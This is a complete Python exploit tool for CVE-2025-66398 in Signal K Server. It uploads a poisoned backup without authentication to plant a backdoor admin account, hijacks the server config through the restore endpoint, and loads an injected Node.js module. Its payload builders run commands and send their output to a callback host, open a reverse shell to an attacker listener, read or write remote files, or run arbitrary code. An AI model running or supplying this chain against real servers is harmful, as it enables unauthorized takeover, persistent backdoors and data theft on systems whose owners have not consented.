README.md
Rendering markdown...
#!/usr/bin/env python3
# CVE-2025-66398 — Signal K RCE via State Pollution → Config Hijacking → Backdoor
# Affected: Signal K Server ≤ 2.18.0
# Impact: Unauthenticated attacker can inject a backdoor admin account and achieve RCE
# Author: Joshua van der Poll (https://github.com/joshuavanderpoll)
# Repo: https://github.com/joshuavanderpoll/cve-2025-66398
import argparse
import base64
import http.server
import io
import json
import shlex
import socket
import sys
import threading
import time
import zipfile
from urllib.parse import urlparse
import bcrypt
import requests
BANNER = (
"\033[95m"
r" ___ __ ___ ___ __ __ _______ ___ "
"\n"
r" ____ _____ __|_ ) \_ ) __|___ / / / /|__ / _ ( _ )"
"\n"
r" / _\ V / -_)___/ / () / /|__ \___/ _ \/ _ \|_ \_, / _ "
"\\\n"
r" \__|\_/\___| /___\__/___|___/ \___/\___/___//_/\___/"
"\n"
r" "
)
GITHUB_URL = "https://github.com/joshuavanderpoll/cve-2025-66398"
DEFAULT_USER_AGENT = (
f"Mozilla/5.0 AppleWebKit/537.36 (CVE-2025-66398; +{GITHUB_URL})"
)
DEFAULT_TIMEOUT = 10
DEFAULT_ATTACKER = "backdoor"
DEFAULT_PASSWORD = "H4CK1nd3x!"
RCE_MODULE_DIR = "cve-2025-66398-rce"
SIGNALK_TOKENSEC_PATH = (
"/usr/local/lib/node_modules/signalk-server/dist/tokensecurity"
)
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
_session = requests.Session()
_session.headers["User-Agent"] = DEFAULT_USER_AGENT
_session.verify = False
_timeout = DEFAULT_TIMEOUT
_target_os = "linux"
_signalk_dir_override = None
def _os_tokensec():
"""Path to the Signal K tokensecurity module on the target OS."""
if _target_os == "windows":
return (
"C:/Users/signalk/AppData/Roaming/npm"
"/node_modules/signalk-server/dist/tokensecurity"
)
return SIGNALK_TOKENSEC_PATH
def _os_data_dir():
"""Signal K user data directory on the target OS."""
if _signalk_dir_override:
return _signalk_dir_override.rstrip("/").rstrip("\\")
return None
def _os_shell_spawn():
"""Return (binary, args_list) for the reverse-shell process on the target OS."""
if _target_os == "windows":
return "cmd.exe", []
return "/bin/sh", ["-i"]
def _os_read_cmd(remote_path):
"""Shell command to read a file on the target OS."""
if _target_os == "windows":
return f"type {remote_path}"
return f"cat {shlex.quote(remote_path)}"
def _os_write_cmd(content, remote_path):
"""Shell command to write content to remote_path on the target OS."""
b64 = base64.b64encode(content.encode()).decode()
if _target_os == "windows":
safe_path = remote_path.replace("'", "''")
return (
f"powershell -NoP -NonI -W Hidden -C "
f"\"[IO.File]::WriteAllBytes('{safe_path}',"
f"[Convert]::FromBase64String('{b64}'))\" && echo written"
)
return (
f"echo {shlex.quote(b64)} | base64 -d > {shlex.quote(remote_path)}"
" && echo written"
)
def ok(msg):
print(f" \033[92m[+]\033[0m {msg}")
def info(msg):
print(f" \033[94m[*]\033[0m {msg}")
def warn(msg):
print(f" \033[93m[@]\033[0m {msg}")
def err(msg):
print(f" \033[91m[-]\033[0m {msg}")
def prompt(msg, default=None):
suffix = f" [{default}]" if default else ""
try:
val = input(f" \033[96m[?]\033[0m {msg}{suffix}: ").strip()
except (KeyboardInterrupt, EOFError):
print()
sys.exit(0)
return val if val else default
def confirm(msg):
try:
ans = input(f" \033[96m[?]\033[0m {msg} [y/N]: ").strip().lower()
except (KeyboardInterrupt, EOFError):
print()
sys.exit(0)
return ans in ("y", "yes")
def normalise_target(raw):
raw = raw.strip().rstrip("/")
if not raw.startswith("http"):
raw = "http://" + raw
return raw
def login(target, username, password):
try:
res = _session.post(
f"{target}/signalk/v1/auth/login",
json={"username": username, "password": password},
timeout=_timeout,
)
if res.status_code == 200:
return res.json().get("token")
except requests.ConnectionError:
pass
return None
def _print_server_info(target, res):
parsed = urlparse(target)
info(f"Target : {parsed.scheme}://{parsed.netloc}")
info(f"Target OS : {_target_os}")
server_hdr = res.headers.get("Server") or res.headers.get("X-Powered-By")
if server_hdr:
info(f"Server header : {server_hdr}")
try:
data = res.json()
# Discovery endpoint: {"server": {"id": ..., "version": ...}, "endpoints": {...}}
srv = data.get("server") or {}
version = srv.get("version") or (
(list(data.get("endpoints", {}).values()) or [{}])[0].get("version")
)
if version:
ok(f"Detected version: Signal K Server {version}")
srv_id = srv.get("id")
if srv_id:
info(f"Server ID : {srv_id}")
except Exception:
pass
def check_reachable(target):
try:
res = _session.get(target, timeout=_timeout)
_print_server_info(target, res)
return True
except requests.ConnectionError:
err(f"Could not reach {target}. Is the server running?")
sys.exit(1)
except requests.Timeout:
err(f"Timed out connecting to {target}.")
sys.exit(1)
def do_check(target):
info("Checking if target is vulnerable to CVE-2025-66398 ...")
print()
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w") as z:
z.writestr(
"security.json",
json.dumps({"users": [], "devices": [], "immutableConfig": False, "acls": []}),
)
zip_buffer.seek(0)
try:
res = _session.post(
f"{target}/skServer/validateBackup",
files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
timeout=_timeout,
)
except requests.ConnectionError:
err(f"Could not reach {target}.")
sys.exit(1)
if res.status_code == 200:
ok("Target is VULNERABLE — /skServer/validateBackup accepts unauthenticated uploads.")
try:
data = res.json()
restore_path = (
data.get("restoreFilePath") or data.get("filePath") or data.get("path")
)
if restore_path:
ok(f"restoreFilePath : {restore_path}")
except Exception:
pass
elif res.status_code == 401:
ok("Target appears PATCHED — endpoint requires authentication (HTTP 401).")
else:
warn(f"Unexpected response: HTTP {res.status_code}. Target may or may not be vulnerable.")
print()
def do_pollute(target, attacker_name, attacker_pass):
global _signalk_dir_override
print()
info("Phase 1 of 3 -- State Pollution")
info(f"Backdoor account to inject : {attacker_name}")
info(f"Backdoor password to inject : {attacker_pass}")
print()
info("Hashing password with bcrypt ...")
hashed = bcrypt.hashpw(attacker_pass.encode(), bcrypt.gensalt(rounds=10)).decode()
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w") as z:
security_config = {
"users": [
{
"username": attacker_name,
"password": hashed,
"type": "admin",
}
],
"devices": [],
"immutableConfig": False,
"acls": [],
}
z.writestr("security.json", json.dumps(security_config))
zip_buffer.seek(0)
info("Uploading malicious backup to /skServer/validateBackup ...")
try:
res = _session.post(
f"{target}/skServer/validateBackup",
files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
timeout=_timeout,
)
except requests.ConnectionError:
err(f"Could not reach {target}. Is the server running?")
sys.exit(1)
if res.status_code != 200:
err(f"Upload failed -- HTTP {res.status_code}: {res.text}")
sys.exit(1)
ok("Malicious zip accepted. Server restoreFilePath is now poisoned.")
try:
data = res.json()
restore_path = data.get("restoreFilePath") or data.get("filePath") or data.get("path")
if restore_path:
ok(f"restoreFilePath : {restore_path}")
if not _signalk_dir_override:
# restoreFilePath is typically <datadir>/backups/tmp-xxx.backup or
# <datadir>/tmp-xxx.backup — walk up until we leave a known sub-dir.
norm = restore_path.replace("\\", "/")
parts = norm.rsplit("/", 1)[0] # strip filename
_KNOWN_SUB = {"backups", "tmp", "uploads", "restore"}
while parts and parts.split("/")[-1].lower() in _KNOWN_SUB:
parts = parts.rsplit("/", 1)[0]
if parts and parts != ".":
_signalk_dir_override = parts
ok(f"Auto-detected data dir: {parts}")
files = data.get("files")
if files:
ok(f"Accepted files : {', '.join(files)}")
except Exception:
pass
print()
warn("-- Next step --")
warn(" Trigger the restore as a logged-in admin (Phase 2), then")
warn(" restart the server so it loads the new config.")
warn(" Once the backdoor account is active, proceed to Phase 3 (RCE).")
print()
def do_restore(target, admin_name, admin_pass):
global _signalk_dir_override
print()
info("Phase 2 of 3 -- Config Hijacking via /restore")
while True:
info(f"Authenticating as admin: {admin_name}")
token = login(target, admin_name, admin_pass)
if token:
break
err("Admin login failed. Wrong username or password.")
warn(" Hint: if you already ran the exploit earlier,")
warn(" try the backdoor credentials you injected instead.")
if not confirm("Try again with different credentials?"):
sys.exit(0)
admin_name = prompt("Admin username", default=admin_name)
admin_pass = prompt("Admin password")
ok("Admin login successful.")
ok(f"Session token : {token[:40]}...")
info("Triggering restore endpoint with poisoned backup ...")
headers = {"Authorization": f"Bearer {token}"}
try:
res = _session.post(
f"{target}/skServer/restore",
json={"security.json": True},
headers=headers,
timeout=_timeout,
)
except requests.ConnectionError:
err(f"Could not reach {target}.")
sys.exit(1)
if res.status_code in (200, 202):
ok("Restore triggered -- backdoor account written to disk.")
try:
data = res.json()
restored = data.get("restored") or data.get("files") or data.get("written")
if restored:
ok(f"Restored files : {restored}")
cfg_path = data.get("configPath") or data.get("path")
if cfg_path:
ok(f"Config path : {cfg_path}")
if not _signalk_dir_override:
detected = cfg_path.replace("\\", "/").rsplit("/", 1)[0]
if detected and detected != ".":
_signalk_dir_override = detected
ok(f"Auto-detected data dir: {detected}")
except Exception:
pass
else:
err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
sys.exit(1)
print()
def reboot_as_user(target, admin_name, admin_pass):
info(f"Logging in as {admin_name} ...")
token = login(target, admin_name, admin_pass)
if not token:
err("Login failed. Check credentials.")
warn(" Hint: if the exploit already ran successfully, try the backdoor")
warn(" username and password you injected in Phase 1.")
return
ok("Logged in.")
info("Sending restart request ...")
headers = {"Authorization": f"Bearer {token}"}
try:
res = _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
except requests.ConnectionError:
err(f"Could not reach {target}.")
return
if res.status_code in (200, 202):
ok("Restart request accepted. Waiting for server to come back up ...")
_wait_for_server(target)
else:
err(f"Restart failed -- HTTP {res.status_code}: {res.text}")
def _wait_for_server(target, attempts=20, delay=2):
for i in range(attempts):
time.sleep(delay)
try:
_session.get(target, timeout=_timeout)
ok("Server is back online.")
return
except Exception:
print(f" \033[90m[@]\033[0m Waiting ... ({i + 1}/{attempts})", end="\r")
print()
warn("Server did not come back within the timeout. Check it manually.")
def _command_js(callback_host, callback_port, command):
return (
"'use strict';\n"
"var cp = require('child_process');\n"
f"cp.exec({json.dumps(command)}, function(err, stdout, stderr) {{\n"
" var out = (stdout || stderr || (err ? err.message : '(no output)')).trim();\n"
" var http = require('http');\n"
f" var opts = {{hostname: {json.dumps(callback_host)}, port: {callback_port},\n"
" method: 'POST', path: '/',\n"
" headers: {'Content-Type': 'text/plain',\n"
" 'Content-Length': Buffer.byteLength(out)}};\n"
" var req = http.request(opts, function() {});\n"
" req.on('error', function() {});\n"
" req.write(out); req.end();\n"
"});\n"
f"module.exports = require({json.dumps(_os_tokensec())});\n"
)
def _shell_js(lhost, lport):
shell_bin, shell_args = _os_shell_spawn()
return (
"'use strict';\n"
"var net = require('net');\n"
"var cp = require('child_process');\n"
f"var sh = cp.spawn({json.dumps(shell_bin)}, {json.dumps(shell_args)});\n"
"var c = new net.Socket();\n"
f"c.connect({lport}, {json.dumps(lhost)}, function() {{\n"
" c.pipe(sh.stdin);\n"
" sh.stdout.pipe(c);\n"
" sh.stderr.pipe(c);\n"
" c.on('close', function() { sh.kill(); });\n"
"});\n"
f"module.exports = require({json.dumps(_os_tokensec())});\n"
)
def _code_js(raw_code):
return (
"'use strict';\n"
f"{raw_code}\n"
f"module.exports = require({json.dumps(_os_tokensec())});\n"
)
def _upload_rce_zip(target, attacker_name, attacker_pass, evil_js):
hashed = bcrypt.hashpw(attacker_pass.encode(), bcrypt.gensalt(rounds=10)).decode()
data_dir = _os_data_dir()
if not data_dir:
err("Signal K data directory is not set.")
err(" Use -signalk-dir <path> or let Phase 2 auto-detect it.")
err(" WARNING: a wrong path will corrupt the Signal K server config and service.")
return False
security_config = {
"users": [{"username": attacker_name, "password": hashed, "type": "admin"}],
"devices": [],
"immutableConfig": False,
"acls": [],
}
settings_config = {
"security": {"strategy": f"{data_dir}/{RCE_MODULE_DIR}"},
}
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w") as z:
z.writestr("security.json", json.dumps(security_config))
z.writestr("settings.json", json.dumps(settings_config))
# Directory entry — listSafeRestoreFiles allows directories unconditionally
z.writestr(zipfile.ZipInfo(f"{RCE_MODULE_DIR}/"), "")
z.writestr(f"{RCE_MODULE_DIR}/index.js", evil_js)
zip_buffer.seek(0)
try:
res = _session.post(
f"{target}/skServer/validateBackup",
files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
timeout=_timeout,
)
except requests.ConnectionError:
return False
return res.status_code == 200
def try_rce(target, attacker_name, attacker_pass, admin_name, admin_pass, command):
print()
info("Phase 3 of 3 -- Remote Code Execution (security strategy injection)")
# Grab a free ephemeral port for the callback listener
with socket.socket() as s:
s.bind(("", 0))
callback_port = s.getsockname()[1]
result = {"output": None}
received = threading.Event()
class _Handler(http.server.BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.get("Content-Length", 0))
body = self.rfile.read(length).decode("utf-8", errors="replace")
result["output"] = body
self.send_response(200)
self.end_headers()
received.set()
def log_message(self, *_):
pass
srv = http.server.HTTPServer(("", callback_port), _Handler)
threading.Thread(target=srv.serve_forever, daemon=True).start()
info(f"Callback listener started on port {callback_port}.")
# Use host.docker.internal when targeting localhost (Docker Desktop)
parsed = urlparse(target)
if parsed.hostname in ("localhost", "127.0.0.1", "::1"):
callback_host = "host.docker.internal"
else:
callback_host = parsed.hostname
info(f"Callback host : {callback_host}")
info("Building and uploading RCE payload ...")
js = _command_js(callback_host, callback_port, command)
if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
err("RCE zip upload failed.")
srv.shutdown()
return False
ok("RCE zip accepted by server.")
# Try backdoor first, fall back to the supplied admin account
token = login(target, attacker_name, attacker_pass)
if token:
restore_as = attacker_name
elif admin_name:
token = login(target, admin_name, admin_pass)
restore_as = admin_name
else:
token = None
if not token:
err(
"Cannot authenticate to trigger restore. "
"Restart the server first (option 2), then retry."
)
srv.shutdown()
return False
ok(f"Authenticated as {restore_as}.")
ok(f"Session token : {token[:40]}...")
info("Triggering restore with RCE payload ...")
headers = {"Authorization": f"Bearer {token}"}
restore_body = {
"security.json": True,
"settings.json": True,
f"{RCE_MODULE_DIR}/": True,
}
try:
res = _session.post(
f"{target}/skServer/restore",
json=restore_body,
headers=headers,
timeout=_timeout,
)
except requests.ConnectionError:
err(f"Could not reach {target}.")
srv.shutdown()
return False
if res.status_code not in (200, 202):
err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
srv.shutdown()
return False
ok("Payload written to disk.")
try:
data = res.json()
restored = data.get("restored") or data.get("files") or data.get("written")
if restored:
ok(f"Restored files : {restored}")
cfg_path = data.get("configPath") or data.get("path")
if cfg_path:
ok(f"Config path : {cfg_path}")
except Exception:
pass
info("Restarting server ...")
# Re-authenticate — restore may have invalidated the old session
token = login(target, attacker_name, attacker_pass)
if not token and admin_name:
token = login(target, admin_name, admin_pass)
if not token:
warn("Could not re-authenticate for restart. Restart the server manually.")
else:
headers = {"Authorization": f"Bearer {token}"}
try:
_session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
except (requests.Timeout, requests.ConnectionError):
pass # restart disconnects the socket — expected
_wait_for_server(target)
info("Waiting up to 15 s for command output callback ...")
got_it = received.wait(timeout=15)
srv.shutdown()
if got_it:
print()
ok("Command output received:")
print(" " + "─" * 60)
for line in (result["output"] or "").splitlines():
print(f" {line}")
print(" " + "─" * 60)
print()
print(
f" \033[93m⭐ If this tool helped you, consider starring the repo: "
f"\033[0m\033[1m{GITHUB_URL}\033[0m"
)
print()
return True
else:
warn("No callback received within timeout.")
warn(f" Expected callback at: http://{callback_host}:{callback_port}/")
warn(" The container may not be able to reach that address.")
warn(" Check that host.docker.internal resolves inside the container,")
warn(" or set a custom callback host via the code.")
print()
return False
def try_shell(target, attacker_name, attacker_pass, admin_name, admin_pass, lhost, lport):
print()
info("Phase 3 of 3 -- Reverse Shell (Node.js socket shell)")
info(f"Listener : {lhost}:{lport}")
info(f"Catch with : nc -lvnp {lport}")
print()
js = _shell_js(lhost, lport)
if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
err("Shell zip upload failed.")
return False
ok("Shell zip accepted by server.")
token = login(target, attacker_name, attacker_pass)
if token:
restore_as = attacker_name
elif admin_name:
token = login(target, admin_name, admin_pass)
restore_as = admin_name
else:
token = None
if not token:
err(
"Cannot authenticate to trigger restore. "
"Restart the server first (option 2), then retry."
)
return False
ok(f"Authenticated as {restore_as}.")
ok(f"Session token : {token[:40]}...")
info("Triggering restore with shell payload ...")
headers = {"Authorization": f"Bearer {token}"}
restore_body = {
"security.json": True,
"settings.json": True,
f"{RCE_MODULE_DIR}/": True,
}
try:
res = _session.post(
f"{target}/skServer/restore",
json=restore_body,
headers=headers,
timeout=_timeout,
)
except requests.ConnectionError:
err(f"Could not reach {target}.")
return False
if res.status_code not in (200, 202):
err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
return False
ok("Payload written to disk.")
info("Restarting server — shell will connect back on module load ...")
token = login(target, attacker_name, attacker_pass)
if not token and admin_name:
token = login(target, admin_name, admin_pass)
if token:
headers = {"Authorization": f"Bearer {token}"}
try:
_session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
except (requests.Timeout, requests.ConnectionError):
pass
_wait_for_server(target)
ok(f"Server back online. Shell should connect to {lhost}:{lport}.")
return True
def try_code(target, attacker_name, attacker_pass, admin_name, admin_pass, raw_code):
print()
info("Phase 3 of 3 -- Code Injection (raw Node.js module)")
print()
js = _code_js(raw_code)
if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
err("Code zip upload failed.")
return False
ok("Code zip accepted by server.")
token = login(target, attacker_name, attacker_pass)
if token:
restore_as = attacker_name
elif admin_name:
token = login(target, admin_name, admin_pass)
restore_as = admin_name
else:
token = None
if not token:
err(
"Cannot authenticate to trigger restore. "
"Restart the server first (option 2), then retry."
)
return False
ok(f"Authenticated as {restore_as}.")
ok(f"Session token : {token[:40]}...")
info("Triggering restore with code payload ...")
headers = {"Authorization": f"Bearer {token}"}
restore_body = {
"security.json": True,
"settings.json": True,
f"{RCE_MODULE_DIR}/": True,
}
try:
res = _session.post(
f"{target}/skServer/restore",
json=restore_body,
headers=headers,
timeout=_timeout,
)
except requests.ConnectionError:
err(f"Could not reach {target}.")
return False
if res.status_code not in (200, 202):
err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
return False
ok("Payload written to disk.")
info("Restarting server — injected code runs on module load ...")
token = login(target, attacker_name, attacker_pass)
if not token and admin_name:
token = login(target, admin_name, admin_pass)
if token:
headers = {"Authorization": f"Bearer {token}"}
try:
_session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
except (requests.Timeout, requests.ConnectionError):
pass
_wait_for_server(target)
ok("Server back online. Code executed on module load.")
return True
def restart_menu(target, attacker_name, attacker_pass, admin_name=None, admin_pass=None):
while True:
print()
print(" \033[1mWhat do you want to do next?\033[0m")
print(" 1) Try exploit (attempt RCE as backdoor user)")
print(" 2) Reboot as user (trigger server restart via admin creds)")
print(" 3) Exit")
print()
try:
choice = input(" \033[96m[?]\033[0m Choose [1/2/3]: ").strip()
except (KeyboardInterrupt, EOFError):
print()
sys.exit(0)
if choice == "1":
cmd = prompt("Command to run on the server", default="id")
succeeded = try_rce(
target, attacker_name, attacker_pass, admin_name, admin_pass, cmd
)
if not succeeded:
warn("RCE failed -- see hints above.")
elif choice == "2":
admin_name = prompt("Admin username", default=admin_name)
admin_pass = prompt("Admin password", default=admin_pass)
if not admin_name or not admin_pass:
err("Username and password are required.")
continue
reboot_as_user(target, admin_name, admin_pass)
elif choice == "3":
info("Exiting.")
sys.exit(0)
else:
warn("Invalid choice. Enter 1, 2 or 3.")
def interactive_mode(preset_target=None):
global _signalk_dir_override
print()
if preset_target:
target = normalise_target(preset_target)
info(f"Target set to: {target}")
else:
raw = prompt("Target Signal K server")
target = normalise_target(raw)
info(f"Target set to: {target}")
check_reachable(target)
print()
attacker_name = prompt("Backdoor username to inject", default=DEFAULT_ATTACKER)
attacker_pass = prompt("Backdoor password to inject", default=DEFAULT_PASSWORD)
print()
info("Phase 1: State Pollution")
info(f" Uploads a malicious .backup file to {target}/skServer/validateBackup")
info(f" Embeds a backdoor admin account ({attacker_name}) into the restore state.")
info(" No authentication required.")
print()
if not confirm("Continue with pollution?"):
info("Aborted.")
sys.exit(0)
do_pollute(target, attacker_name, attacker_pass)
print()
info("Phase 2: Config Hijacking")
info(" The server must restore from the poisoned backup and then restart")
info(" before the backdoor account becomes active.")
print()
if confirm("Do you have admin credentials to trigger the restore now?"):
admin_name = prompt("Admin username")
admin_pass = prompt("Admin password")
do_restore(target, admin_name, admin_pass)
if not _signalk_dir_override:
warn("Could not auto-detect the Signal K data directory from restore response.")
print()
err(" !! A wrong path will BREAK the Signal K server — it will fail to start !!")
custom = prompt("Signal K data dir on target (required)")
if not custom:
err("Data directory is required to continue. Aborting.")
sys.exit(1)
_signalk_dir_override = custom
else:
admin_name = None
admin_pass = None
warn(
"Waiting for a legitimate admin to trigger restore, "
"or restart the server manually."
)
print()
err(" !! A wrong path will BREAK the Signal K server — it will fail to start !!")
custom = prompt("Signal K data dir on target (required)")
if not custom:
err("Data directory is required to continue. Aborting.")
sys.exit(1)
_signalk_dir_override = custom
restart_menu(
target,
attacker_name,
attacker_pass,
admin_name=admin_name,
admin_pass=admin_pass,
)
def run_noninteractive(args, target):
backdoor_name = args.backdoor_user
backdoor_pass = args.backdoor_pass
admin_name = args.admin_user
admin_pass = args.admin_pass
if args.check:
do_check(target)
return
if args.shell and (not args.lhost or not args.lport):
err("-shell requires -lhost and -lport.")
sys.exit(1)
needs_phase3 = any([args.read_file, args.write_file, args.command, args.code, args.shell])
if admin_name and admin_pass:
do_pollute(target, backdoor_name, backdoor_pass)
do_restore(target, admin_name, admin_pass)
reboot_as_user(target, admin_name, admin_pass)
else:
warn("No admin credentials provided — skipping Phases 1 and 2.")
warn(" Use -admin-user and -admin-pass to run the full exploit chain.")
warn(" Assuming backdoor account is already active from a previous run.")
print()
if needs_phase3 and not _signalk_dir_override:
err("Signal K data directory is required for Phase 3 but was not set.")
err(" Run Phase 2 first (auto-detects the path), or pass -signalk-dir <path>.")
err(" WARNING: a wrong path will corrupt the Signal K server config.")
sys.exit(1)
if args.read_file:
try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass,
_os_read_cmd(args.read_file))
elif args.write_file:
try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass,
_os_write_cmd(args.write_file[0], args.write_file[1]))
elif args.command:
try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass, args.command)
elif args.code:
try_code(target, backdoor_name, backdoor_pass, admin_name, admin_pass, args.code)
elif args.shell:
try_shell(
target, backdoor_name, backdoor_pass, admin_name, admin_pass,
args.lhost, args.lport,
)
def build_parser():
parser = argparse.ArgumentParser(
prog="exp.py",
description="CVE-2025-66398 -- Signal K State Pollution -> Backdoor -> RCE",
formatter_class=argparse.RawDescriptionHelpFormatter,
add_help=True,
)
parser.add_argument(
"-target",
metavar="URL",
default=None,
help="Base URL of the Signal K server",
)
parser.add_argument(
"-useragent",
metavar="UA",
default=DEFAULT_USER_AGENT,
help="User-Agent header for all HTTP requests",
)
parser.add_argument(
"-timeout",
metavar="SEC",
type=int,
default=DEFAULT_TIMEOUT,
help=f"Request timeout in seconds (default: {DEFAULT_TIMEOUT})",
)
parser.add_argument(
"-target-os",
metavar="OS",
choices=["linux", "windows"],
default="linux",
help="Target server OS for payload/path adaptation: linux (default) or windows",
)
parser.add_argument(
"-signalk-dir",
metavar="DIR",
default=None,
help="Override the Signal K data directory on the target (default: OS-dependent)",
)
parser.add_argument(
"-check",
action="store_true",
help="Test if the target is vulnerable without exploiting it",
)
parser.add_argument("-admin-user", metavar="USER", default=None, help="Admin username for Phase 2 restore")
parser.add_argument("-admin-pass", metavar="PASS", default=None, help="Admin password for Phase 2 restore")
parser.add_argument(
"-backdoor-user",
metavar="USER",
default=DEFAULT_ATTACKER,
help=f"Backdoor username to inject (default: {DEFAULT_ATTACKER})",
)
parser.add_argument(
"-backdoor-pass",
metavar="PASS",
default=DEFAULT_PASSWORD,
help=f"Backdoor password to inject (default: {DEFAULT_PASSWORD})",
)
parser.add_argument("-command", metavar="CMD", default=None, help="Execute a command on the server (non-interactive)")
parser.add_argument("-read-file", metavar="PATH", default=None, help="Read a remote file via RCE")
parser.add_argument(
"-write-file",
nargs=2,
metavar=("CONTENT", "PATH"),
default=None,
help="Write CONTENT to PATH on the server via RCE",
)
parser.add_argument("-code", metavar="CODE", default=None, help="Inject raw Node.js code as the security module")
parser.add_argument("-shell", action="store_true", help="Deploy a reverse shell (requires -lhost and -lport)")
parser.add_argument("-lhost", metavar="HOST", default=None, help="Listener host for reverse shell")
parser.add_argument("-lport", metavar="PORT", type=int, default=None, help="Listener port for reverse shell")
return parser
def main():
global _timeout, _target_os, _signalk_dir_override
print(BANNER)
print(f" \033[95m\033[1m{GITHUB_URL}\033[0m")
print()
parser = build_parser()
args = parser.parse_args()
_session.headers["User-Agent"] = args.useragent
_timeout = args.timeout
_target_os = args.target_os
_signalk_dir_override = args.signalk_dir
non_interactive = any([
args.check,
args.command,
args.read_file,
args.write_file,
args.code,
args.shell,
])
if non_interactive:
if not args.target:
err("-target is required.")
sys.exit(1)
target = normalise_target(args.target)
check_reachable(target)
run_noninteractive(args, target)
else:
interactive_mode(preset_target=args.target)
if __name__ == "__main__":
main()